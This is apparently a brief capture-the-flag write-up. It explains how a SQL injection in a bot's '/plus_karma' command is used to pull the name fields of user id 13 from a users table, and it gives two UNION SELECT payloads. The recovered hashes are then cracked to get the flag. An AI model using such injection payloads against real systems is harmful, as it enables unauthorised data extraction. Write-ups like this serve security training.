https://gist.github.com/dragon996/d6a4d77e175cfe26853a94057096915e - sources

We can see sqlinj there in multiple queries, we need to construct evil query to got name of id 13
Also we know table structure, so

```
/plus_karma -1 union select first_name from users where id=13
/plus_karma -1 union select last_name from users where id=13
```

We got hashes, so lets decrypt it with crackstation and submit flag.